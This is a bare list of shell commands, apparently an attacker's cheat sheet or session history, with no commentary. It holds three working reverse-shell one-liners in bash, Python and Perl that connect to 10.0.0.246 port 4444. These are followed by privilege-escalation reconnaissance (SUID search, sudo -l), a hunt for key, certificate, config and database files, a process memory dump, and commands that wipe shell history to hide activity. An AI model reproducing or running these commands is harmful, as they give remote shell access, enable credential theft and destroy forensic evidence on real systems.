ls
pwd
bash -i >& /dev/tcp/10.0.0.246/4444 0>&1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.246",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
perl -e 'use Socket;$i="10.0.0.246";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
find / -perm -4000 -type f 2>/dev/null
sudo -l
uname -a
find / -type d -name ".*" 2>/dev/null
find / -type f \( -name "*.conf" -o -name "*.pem" -o -name "*.key" -o -name "*.db" \) 2>/dev/null
gcore <pid>
history -c && rm ~/.bash_history
